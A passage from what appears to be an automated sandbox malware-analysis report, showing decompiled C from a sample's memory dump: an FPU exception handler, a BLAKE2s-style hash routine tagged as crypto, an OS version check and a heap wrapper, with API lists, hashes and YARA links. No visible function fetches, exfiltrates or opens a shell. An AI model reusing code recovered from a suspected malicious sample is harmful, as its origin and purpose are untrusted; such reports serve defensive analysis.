					if(_t172 == 0x400) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffd | 1;
						L26:
						 *_t257 = _t225;
						L29:
						_t175 =  *_t265 & 0x00000300;
						if(_t175 == 0) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
							L35:
							 *_t250 = _t178;
							L36:
							_t179 = _a4;
							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t254 = _a4;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t240;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t240;
							}
							E00CCDF1C(_t254);
							RaiseException(_t262, 0, 1,  &_a4);
							_t256 = _a4;
							if((_t256[2] & 0x00000010) != 0) {
								 *_t265 =  *_t265 & 0xfffffffe;
							}
							if((_t256[2] & 0x00000008) != 0) {
								 *_t265 =  *_t265 & 0xfffffffb;
							}
							if((_t256[2] & 0x00000004) != 0) {
								 *_t265 =  *_t265 & 0xfffffff7;
							}
							if((_t256[2] & 0x00000002) != 0) {
								 *_t265 =  *_t265 & 0xffffffef;
							}
							if((_t256[2] & 0x00000001) != 0) {
								 *_t265 =  *_t265 & 0xffffffdf;
							}
							_t195 =  *_t256 & 0x00000003;
							if(_t195 == 0) {
								 *_t265 =  *_t265 & 0xfffff3ff;
							} else {
								_t206 = _t195 - 1;
								if(_t206 == 0) {
									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t265 = _t209;
									L58:
									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
									if(_t199 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t265 = _t202;
										L65:
										if(_a28 == 0) {
											 *_t240 = _t256[0x14];
										} else {
											 *_t240 = _t256[0x14];
										}
										return _t202;
									}
									_t203 = _t199 - 1;
									if(_t203 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t202 = _t203 - 1;
									if(_t202 == 0) {
										 *_t265 =  *_t265 & 0xfffff3ff;
									}
									goto L65;
								}
								_t210 = _t206 - 1;
								if(_t210 == 0) {
									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t210 == 1) {
									 *_t265 =  *_t265 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}























                0x00cd0662
                0x00cd0669
                0x00cd066e
                0x00cd0674
                0x00cd0677
                0x00cd067d
                0x00cd0682
                0x00cd0687
                0x00cd0687
                0x00cd068d
                0x00cd0692
                0x00cd0697
                0x00cd0697
                0x00cd069e
                0x00cd06a3
                0x00cd06a8
                0x00cd06a8
                0x00cd06af
                0x00cd06b4
                0x00cd06b9
                0x00cd06b9
                0x00cd06c0
                0x00cd06c5
                0x00cd06ca
                0x00cd06ca
                0x00cd06d2
                0x00cd06e2
                0x00cd06f4
                0x00cd0706
                0x00cd0719
                0x00cd072b
                0x00cd0733
                0x00cd0738
                0x00cd073d
                0x00cd073d
                0x00cd0744
                0x00cd0749
                0x00cd0749
                0x00cd0750
                0x00cd0755
                0x00cd0755
                0x00cd075c
                0x00cd0761
                0x00cd0761
                0x00cd0768
                0x00cd076d
                0x00cd076d
                0x00cd0777
                0x00cd0779
                0x00cd07b3
                0x00cd077b
                0x00cd0780
                0x00cd07a4
                0x00cd07ac
                0x00cd07a0
                0x00cd07a0
                0x00cd07b6
                0x00cd07bd
                0x00cd07bf
                0x00cd07e1
                0x00cd07e9
                0x00cd07ec
                0x00cd07ec
                0x00cd07ee
                0x00cd07ee
                0x00cd07f9
                0x00cd07ff
                0x00cd0804
                0x00cd080b
                0x00cd0845
                0x00cd0850
                0x00cd0856
                0x00cd0859
                0x00cd085c
                0x00cd0868
                0x00cd0870
                0x00cd080d
                0x00cd0810
                0x00cd081c
                0x00cd0822
                0x00cd0828
                0x00cd082b
                0x00cd0834
                0x00cd0834
                0x00cd0873
                0x00cd0881
                0x00cd0887
                0x00cd088e
                0x00cd0890
                0x00cd0890
                0x00cd0897
                0x00cd0899
                0x00cd0899
                0x00cd08a0
                0x00cd08a2
                0x00cd08a2
                0x00cd08a9
                0x00cd08ab
                0x00cd08ab
                0x00cd08b2
                0x00cd08b4
                0x00cd08b4
                0x00cd08c1
                0x00cd08c4
                0x00cd08fb
                0x00cd08c6
                0x00cd08c6
                0x00cd08c9
                0x00cd08f4
                0x00cd08e9
                0x00cd08e9
                0x00cd08fd
                0x00cd0905
                0x00cd0908
                0x00cd0927
                0x00cd092c
                0x00cd092c
                0x00cd092e
                0x00cd0933
                0x00cd093f
                0x00cd0935
                0x00cd0938
                0x00cd0938
                0x00cd0944
                0x00cd0944
                0x00cd090a
                0x00cd090d
                0x00cd091c
                0x00000000
                0x00cd091c
                0x00cd090f
                0x00cd0912
                0x00cd0914
                0x00cd0914
                0x00000000
                0x00cd0912
                0x00cd08cb
                0x00cd08ce
                0x00cd08e4
                0x00000000
                0x00cd08e4
                0x00cd08d3
                0x00cd08d5
                0x00cd08d5
                0x00cd08d3
                0x00000000
                0x00cd08c4
                0x00cd07c6
                0x00cd07d4
                0x00cd07dc
                0x00000000
                0x00cd07dc
                0x00cd07ca
                0x00cd07cf
                0x00cd07cf
                0x00000000
                0x00cd07ca
                0x00cd0787
                0x00cd0795
                0x00cd079d
                0x00000000
                0x00cd079d
                0x00cd078b
                0x00cd0790
                0x00cd0790
                0x00cd078b

                APIs
                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00CD064F,?,?,00000008,?,?,00CD02EF,00000000), ref: 00CD0881
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ExceptionRaise
                • String ID:
                • API String ID: 3997070919-0
                • Opcode ID: e07dca0b43a56ed62bb2f426c13128987088dc7a800a40cfecc3b37abf948aa5
                • Instruction ID: e16653d1e174d6b38e4cf7bd1de27b9e1ac6726f09dc18d42c5483cd7fe687b7
                • Opcode Fuzzy Hash: e07dca0b43a56ed62bb2f426c13128987088dc7a800a40cfecc3b37abf948aa5
                • Instruction Fuzzy Hash: FDB15B356106089FD715CF2CC48AB657BE0FF44364F258659EAA9CF3A2C335EA92CB40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CA3EAD, Relevance: 1.6, Strings: 1, Instructions: 332COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 81%
                			E00CA3EAD() {
				void* _t230;
				signed int* _t231;
				intOrPtr _t240;
				signed int _t245;
				intOrPtr _t246;
				signed int _t257;
				intOrPtr _t258;
				signed int _t269;
				intOrPtr _t270;
				signed int _t275;
				signed int _t280;
				signed int _t285;
				signed int _t290;
				signed int _t295;
				intOrPtr _t296;
				signed int _t301;
				intOrPtr _t302;
				signed int _t307;
				intOrPtr _t308;
				signed int _t313;
				intOrPtr _t314;
				signed int _t319;
				signed int _t324;
				signed int _t329;
				signed int _t333;
				signed int _t334;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t348;
				signed int _t350;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t363;
				signed int _t365;
				signed int _t366;
				signed int _t368;
				signed int _t369;
				signed int _t371;
				signed int _t372;
				signed int _t374;
				signed int _t375;
				intOrPtr _t376;
				intOrPtr _t377;
				signed int _t379;
				signed int _t381;
				intOrPtr _t383;
				signed int _t385;
				signed int _t386;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				intOrPtr _t396;
				signed int _t398;
				intOrPtr _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				signed int _t414;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				intOrPtr _t431;
				signed int _t433;
				intOrPtr _t434;
				void* _t435;
				void* _t436;
				void* _t437;

				_t377 =  *((intOrPtr*)(_t435 + 0xc0));
				_t342 = 0x10;
				 *((intOrPtr*)(_t435 + 0x18)) = 0x3c6ef372;
				memcpy(_t435 + 0x8c,  *(_t435 + 0xd0), _t342 << 2);
				_t436 = _t435 + 0xc;
				_push(8);
				_t230 = memcpy(_t436 + 0x4c,  *(_t377 + 0xf4), 0 << 2);
				_t437 = _t436 + 0xc;
				_t418 =  *_t230 ^ 0x510e527f;
				_t231 =  *(_t377 + 0xfc);
				_t407 =  *(_t230 + 4) ^ 0x9b05688c;
				_t334 =  *(_t437 + 0x64);
				 *(_t437 + 0x28) = 0x6a09e667;
				 *(_t437 + 0x30) = 0xbb67ae85;
				_t379 =  *_t231 ^ 0x1f83d9ab;
				_t348 =  *(_t437 + 0x5c);
				 *(_t437 + 0x44) = _t231[1] ^ 0x5be0cd19;
				 *(_t437 + 0x3c) =  *(_t437 + 0x68);
				 *(_t437 + 0x1c) =  *(_t437 + 0x60);
				 *(_t437 + 0x2c) =  *(_t437 + 0x58);
				 *(_t437 + 0x38) =  *(_t437 + 0x54);
				 *(_t437 + 0x20) =  *(_t437 + 0x50);
				 *((intOrPtr*)(_t437 + 0x10)) = 0;
				 *((intOrPtr*)(_t437 + 0x48)) = 0;
				_t427 =  *(_t437 + 0x44);
				 *(_t437 + 0x14) =  *(_t437 + 0x4c);
				_t240 =  *((intOrPtr*)(_t437 + 0x10));
				 *(_t437 + 0x24) = 0xa54ff53a;
				 *(_t437 + 0x40) = _t334;
				 *(_t437 + 0x34) = _t348;
				do {
					_t37 = _t240 + 0xcd23b0; // 0x3020100
					_t350 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t37 & 0x000000ff) * 4)) + _t348;
					 *(_t437 + 0x14) = _t350;
					_t351 = _t350 ^ _t418;
					asm("rol ecx, 0x10");
					_t245 =  *(_t437 + 0x28) + _t351;
					_t420 =  *(_t437 + 0x34) ^ _t245;
					 *(_t437 + 0x28) = _t245;
					_t246 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror esi, 0xc");
					 *(_t437 + 0x34) = _t420;
					_t48 = _t246 + 0xcd23b1; // 0x4030201
					_t422 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t48 & 0x000000ff) * 4)) + _t420;
					 *(_t437 + 0x14) = _t422;
					_t423 = _t422 ^ _t351;
					asm("ror esi, 0x8");
					_t353 =  *(_t437 + 0x28) + _t423;
					 *(_t437 + 0x28) = _t353;
					asm("ror eax, 0x7");
					 *(_t437 + 0x34) =  *(_t437 + 0x34) ^ _t353;
					_t60 =  *((intOrPtr*)(_t437 + 0x10)) + 0xcd23b2; // 0x5040302
					_t355 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t60 & 0x000000ff) * 4)) +  *(_t437 + 0x1c);
					 *(_t437 + 0x20) = _t355;
					_t356 = _t355 ^ _t407;
					asm("rol ecx, 0x10");
					_t257 =  *(_t437 + 0x30) + _t356;
					_t409 =  *(_t437 + 0x1c) ^ _t257;
					 *(_t437 + 0x30) = _t257;
					_t258 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edi, 0xc");
					 *(_t437 + 0x1c) = _t409;
					_t71 = _t258 + 0xcd23b3; // 0x6050403
					_t411 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t71 & 0x000000ff) * 4)) + _t409;
					 *(_t437 + 0x20) = _t411;
					_t412 = _t411 ^ _t356;
					asm("ror edi, 0x8");
					_t358 =  *(_t437 + 0x30) + _t412;
					 *(_t437 + 0x30) = _t358;
					asm("ror eax, 0x7");
					 *(_t437 + 0x1c) =  *(_t437 + 0x1c) ^ _t358;
					_t82 =  *((intOrPtr*)(_t437 + 0x10)) + 0xcd23b4; // 0x7060504
					_t336 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t82 & 0x000000ff) * 4)) + _t334;
					_t360 = _t336 ^ _t379;
					asm("rol ecx, 0x10");
					_t269 =  *(_t437 + 0x18) + _t360;
					_t381 =  *(_t437 + 0x40) ^ _t269;
					 *(_t437 + 0x18) = _t269;
					_t270 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t91 = _t270 + 0xcd23b5; // 0x8070605
					_t337 = _t336 +  *((intOrPtr*)(_t437 + 0x8c + ( *_t91 & 0x000000ff) * 4)) + _t381;
					 *(_t437 + 0x38) = _t337;
					_t338 = _t337 ^ _t360;
					asm("ror ebx, 0x8");
					_t275 =  *(_t437 + 0x18) + _t338;
					 *(_t437 + 0x18) = _t275;
					asm("ror edx, 0x7");
					 *(_t437 + 0x40) = _t381 ^ _t275;
					_t383 =  *((intOrPtr*)(_t437 + 0x10));
					_t101 = _t383 + 0xcd23b6; // 0x9080706
					_t362 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t101 & 0x000000ff) * 4)) +  *(_t437 + 0x3c);
					 *(_t437 + 0x2c) = _t362;
					_t363 = _t362 ^ _t427;
					asm("rol ecx, 0x10");
					_t280 =  *(_t437 + 0x24) + _t363;
					_t429 =  *(_t437 + 0x3c) ^ _t280;
					 *(_t437 + 0x24) = _t280;
					_t110 = _t383 + 0xcd23b7; // 0xa090807
					asm("ror ebp, 0xc");
					_t385 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t110 & 0x000000ff) * 4)) + _t429;
					 *(_t437 + 0x2c) = _t385;
					_t386 = _t385 ^ _t363;
					asm("ror edx, 0x8");
					_t285 =  *(_t437 + 0x24) + _t386;
					 *(_t437 + 0x24) = _t285;
					asm("ror ebp, 0x7");
					 *(_t437 + 0x3c) = _t429 ^ _t285;
					_t431 =  *((intOrPtr*)(_t437 + 0x10));
					_t121 = _t431 + 0xcd23b8; // 0xb0a0908
					_t365 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t121 & 0x000000ff) * 4)) +  *(_t437 + 0x1c);
					 *(_t437 + 0x14) = _t365;
					_t366 = _t365 ^ _t386;
					asm("rol ecx, 0x10");
					_t290 =  *(_t437 + 0x18) + _t366;
					_t388 =  *(_t437 + 0x1c) ^ _t290;
					 *(_t437 + 0x18) = _t290;
					_t130 = _t431 + 0xcd23b9; // 0xc0b0a09
					asm("ror edx, 0xc");
					_t433 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t130 & 0x000000ff) * 4)) + _t388;
					 *(_t437 + 0x14) = _t433;
					 *(_t437 + 0x4c) = _t433;
					_t427 = _t433 ^ _t366;
					asm("ror ebp, 0x8");
					_t295 =  *(_t437 + 0x18) + _t427;
					_t389 = _t388 ^ _t295;
					 *(_t437 + 0x18) = _t295;
					 *(_t437 + 0x74) = _t295;
					_t296 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0x7");
					 *(_t437 + 0x1c) = _t389;
					 *(_t437 + 0x60) = _t389;
					_t144 = _t296 + 0xcd23ba; // 0xd0c0b0a
					_t390 =  *(_t437 + 0x40);
					_t368 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t144 & 0x000000ff) * 4)) + _t390;
					 *(_t437 + 0x20) = _t368;
					_t369 = _t368 ^ _t423;
					asm("rol ecx, 0x10");
					_t301 =  *(_t437 + 0x24) + _t369;
					_t391 = _t390 ^ _t301;
					 *(_t437 + 0x24) = _t301;
					_t302 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t154 = _t302 + 0xcd23bb; // 0xe0d0c0b
					_t425 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t154 & 0x000000ff) * 4)) + _t391;
					 *(_t437 + 0x20) = _t425;
					 *(_t437 + 0x50) = _t425;
					_t418 = _t425 ^ _t369;
					asm("ror esi, 0x8");
					_t307 =  *(_t437 + 0x24) + _t418;
					_t392 = _t391 ^ _t307;
					 *(_t437 + 0x24) = _t307;
					 *(_t437 + 0x78) = _t307;
					_t308 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0x7");
					 *(_t437 + 0x40) = _t392;
					 *(_t437 + 0x64) = _t392;
					_t167 = _t308 + 0xcd23bc; // 0xf0e0d0c
					_t393 =  *(_t437 + 0x3c);
					_t371 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t167 & 0x000000ff) * 4)) + _t393;
					 *(_t437 + 0x38) = _t371;
					_t372 = _t371 ^ _t412;
					asm("rol ecx, 0x10");
					_t313 =  *(_t437 + 0x28) + _t372;
					_t394 = _t393 ^ _t313;
					 *(_t437 + 0x28) = _t313;
					_t314 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t177 = _t314 + 0xcd23bd; // 0xe0f0e0d
					_t414 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t177 & 0x000000ff) * 4)) + _t394;
					 *(_t437 + 0x38) = _t414;
					 *(_t437 + 0x54) = _t414;
					_t407 = _t414 ^ _t372;
					asm("ror edi, 0x8");
					_t319 =  *(_t437 + 0x28) + _t407;
					_t395 = _t394 ^ _t319;
					 *(_t437 + 0x28) = _t319;
					asm("ror edx, 0x7");
					 *(_t437 + 0x3c) = _t395;
					 *(_t437 + 0x68) = _t395;
					_t396 =  *((intOrPtr*)(_t437 + 0x10));
					 *(_t437 + 0x6c) = _t319;
					_t190 = _t396 + 0xcd23be; // 0xa0e0f0e
					_t374 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t190 & 0x000000ff) * 4)) +  *(_t437 + 0x34);
					 *(_t437 + 0x2c) = _t374;
					_t375 = _t374 ^ _t338;
					asm("rol ecx, 0x10");
					_t324 =  *(_t437 + 0x30) + _t375;
					_t340 =  *(_t437 + 0x34) ^ _t324;
					 *(_t437 + 0x30) = _t324;
					_t199 = _t396 + 0xcd23bf; // 0x40a0e0f
					asm("ror ebx, 0xc");
					_t398 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t199 & 0x000000ff) * 4)) + _t340;
					 *(_t437 + 0x2c) = _t398;
					 *(_t437 + 0x58) = _t398;
					_t379 = _t398 ^ _t375;
					asm("ror edx, 0x8");
					_t329 =  *(_t437 + 0x30) + _t379;
					_t341 = _t340 ^ _t329;
					 *(_t437 + 0x30) = _t329;
					 *(_t437 + 0x70) = _t329;
					asm("ror ebx, 0x7");
					_t240 =  *((intOrPtr*)(_t437 + 0x10)) + 0x10;
					 *(_t437 + 0x34) = _t341;
					_t348 =  *(_t437 + 0x34);
					 *(_t437 + 0x5c) = _t341;
					_t334 =  *(_t437 + 0x40);
					 *((intOrPtr*)(_t437 + 0x10)) = _t240;
				} while (_t240 <= 0x90);
				 *(_t437 + 0x84) = _t379;
				_t399 =  *((intOrPtr*)(_t437 + 0xd0));
				 *(_t437 + 0x88) = _t427;
				_t434 =  *((intOrPtr*)(_t437 + 0x48));
				 *(_t437 + 0x7c) = _t418;
				 *(_t437 + 0x80) = _t407;
				do {
					_t376 =  *((intOrPtr*)(_t399 + 0xf4));
					_t333 =  *(_t437 + _t434 + 0x6c) ^  *(_t376 + _t434) ^  *(_t437 + _t434 + 0x4c);
					 *(_t376 + _t434) = _t333;
					_t434 = _t434 + 4;
				} while (_t434 < 0x20);
				return _t333;
			}

























































































                0x00ca3eb3
                0x00ca3ecd
                0x00ca3ed5
                0x00ca3edd
                0x00ca3edd
                0x00ca3ee9
                0x00ca3eec
                0x00ca3eec
                0x00ca3ef8
                0x00ca3efe
                0x00ca3f04
                0x00ca3f0a
                0x00ca3f0e
                0x00ca3f17
                0x00ca3f20
                0x00ca3f26
                0x00ca3f2f
                0x00ca3f39
                0x00ca3f41
                0x00ca3f49
                0x00ca3f51
                0x00ca3f59
                0x00ca3f61
                0x00ca3f65
                0x00ca3f69
                0x00ca3f6d
                0x00ca3f71
                0x00ca3f75
                0x00ca3f7d
                0x00ca3f81
                0x00ca3f85
                0x00ca3f85
                0x00ca3f99
                0x00ca3f9f
                0x00ca3fa3
                0x00ca3fa9
                0x00ca3fac
                0x00ca3fae
                0x00ca3fb0
                0x00ca3fb4
                0x00ca3fb8
                0x00ca3fbb
                0x00ca3fbf
                0x00ca3fd3
                0x00ca3fd9
                0x00ca3fdd
                0x00ca3fe3
                0x00ca3fe6
                0x00ca3fea
                0x00ca3fee
                0x00ca3ff1
                0x00ca3ffd
                0x00ca400f
                0x00ca4015
                0x00ca4019
                0x00ca401f
                0x00ca4022
                0x00ca4024
                0x00ca4026
                0x00ca402a
                0x00ca402e
                0x00ca4031
                0x00ca4035
                0x00ca4049
                0x00ca404f
                0x00ca4053
                0x00ca4059
                0x00ca405c
                0x00ca4060
                0x00ca4064
                0x00ca4067
                0x00ca406f
                0x00ca4083
                0x00ca408b
                0x00ca4091
                0x00ca4094
                0x00ca4096
                0x00ca4098
                0x00ca409c
                0x00ca40a0
                0x00ca40a3
                0x00ca40b3
                0x00ca40b9
                0x00ca40bd
                0x00ca40c3
                0x00ca40c6
                0x00ca40ca
                0x00ca40ce
                0x00ca40d1
                0x00ca40d5
                0x00ca40d9
                0x00ca40eb
                0x00ca40f1
                0x00ca40f5
                0x00ca40fb
                0x00ca40fe
                0x00ca4100
                0x00ca4102
                0x00ca4106
                0x00ca4111
                0x00ca411d
                0x00ca4123
                0x00ca4127
                0x00ca412d
                0x00ca4130
                0x00ca4134
                0x00ca4138
                0x00ca413b
                0x00ca413f
                0x00ca4143
                0x00ca4155
                0x00ca415b
                0x00ca415f
                0x00ca4165
                0x00ca4168
                0x00ca416a
                0x00ca416c
                0x00ca4170
                0x00ca417b
                0x00ca4187
                0x00ca418d
                0x00ca4191
                0x00ca4195
                0x00ca419b
                0x00ca419e
                0x00ca41a0
                0x00ca41a2
                0x00ca41a6
                0x00ca41aa
                0x00ca41ae
                0x00ca41b1
                0x00ca41b5
                0x00ca41b9
                0x00ca41c0
                0x00ca41cd
                0x00ca41cf
                0x00ca41d3
                0x00ca41dd
                0x00ca41e0
                0x00ca41e2
                0x00ca41e4
                0x00ca41e8
                0x00ca41ec
                0x00ca41ef
                0x00ca41ff
                0x00ca4205
                0x00ca4209
                0x00ca420d
                0x00ca4213
                0x00ca4216
                0x00ca4218
                0x00ca421a
                0x00ca421e
                0x00ca4222
                0x00ca4226
                0x00ca4229
                0x00ca422d
                0x00ca4231
                0x00ca4238
                0x00ca4245
                0x00ca424b
                0x00ca424f
                0x00ca4255
                0x00ca4258
                0x00ca425a
                0x00ca425c
                0x00ca4260
                0x00ca4264
                0x00ca4267
                0x00ca4277
                0x00ca427d
                0x00ca4281
                0x00ca4285
                0x00ca428b
                0x00ca428e
                0x00ca4290
                0x00ca4292
                0x00ca4296
                0x00ca4299
                0x00ca429d
                0x00ca42a1
                0x00ca42a5
                0x00ca42a9
                0x00ca42bb
                0x00ca42c1
                0x00ca42c5
                0x00ca42cb
                0x00ca42ce
                0x00ca42d0
                0x00ca42d2
                0x00ca42d6
                0x00ca42e1
                0x00ca42ed
                0x00ca42ef
                0x00ca42f3
                0x00ca42f7
                0x00ca42f9
                0x00ca4300
                0x00ca4302
                0x00ca4304
                0x00ca4308
                0x00ca4310
                0x00ca4313
                0x00ca4316
                0x00ca431a
                0x00ca431e
                0x00ca4322
                0x00ca4326
                0x00ca432a
                0x00ca4335
                0x00ca433c
                0x00ca4343
                0x00ca434a
                0x00ca434e
                0x00ca4352
                0x00ca4359
                0x00ca4359
                0x00ca4366
                0x00ca436a
                0x00ca436d
                0x00ca4370
                0x00ca437f

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID: gj
                • API String ID: 0-4203073231
                • Opcode ID: 22a0ade61fe89557603e0605dc43cf47df5d6e7ca9007a3a8eb003f23fb9ae3b
                • Instruction ID: f2e5bf1f11d63a75b4c0339264af6e08fbb5a0884a436af540df472eea417933
                • Opcode Fuzzy Hash: 22a0ade61fe89557603e0605dc43cf47df5d6e7ca9007a3a8eb003f23fb9ae3b
                • Instruction Fuzzy Hash: DEF1E4B2A083418FC748CF29D880A2AFBE5BFC8208F15892EF598D7751D734E9558F56
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CAA995, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00CAA995() {
				struct _OSVERSIONINFOW _v280;
				signed int _t6;
				intOrPtr _t12;
				intOrPtr _t13;

				_t12 =  *0xcdd020; // 0x2
				if(_t12 != 0xffffffff) {
					_t6 =  *0xce00f0; // 0xa
					_t13 =  *0xce00f4; // 0x0
				} else {
					_v280.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v280);
					_t12 = _v280.dwPlatformId;
					_t6 = _v280.dwMajorVersion;
					_t13 = _v280.dwMinorVersion;
					 *0xcdd020 = _t12;
					 *0xce00f0 = _t6;
					 *0xce00f4 = _t13;
				}
				if(_t12 != 2) {
					return 0x501;
				} else {
					return (_t6 << 8) + _t13;
				}
			}







                0x00caa998
                0x00caa9a7
                0x00caa9e5
                0x00caa9ea
                0x00caa9a9
                0x00caa9af
                0x00caa9ba
                0x00caa9c0
                0x00caa9c6
                0x00caa9cc
                0x00caa9d2
                0x00caa9d8
                0x00caa9dd
                0x00caa9dd
                0x00caa9f3
                0x00000000
                0x00caa9f5
                0x00000000
                0x00caa9f8

                APIs
                • GetVersionExW.KERNEL32(?), ref: 00CAA9BA
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Version
                • String ID:
                • API String ID: 1889659487-0
                • Opcode ID: 0f86c13471832f5d1fb3fc3e0807a8aded0db1a30f8157f1cf3c5d98c7fd97c5
                • Instruction ID: 51bf117c9dd98bf661c4068f7941ce5fef38badfe3957468aa08b9cd917d4c4f
                • Opcode Fuzzy Hash: 0f86c13471832f5d1fb3fc3e0807a8aded0db1a30f8157f1cf3c5d98c7fd97c5
                • Instruction Fuzzy Hash: 86F030B0D412098BC728CB18EE82BEE77B5F759314F204299DE1547350E370AE80DEA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CCACA1, Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00CCACA1() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0xd00874 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




                0x00ccaca1
                0x00ccaca9
                0x00ccacb1

                APIs
                Memory Dump Source
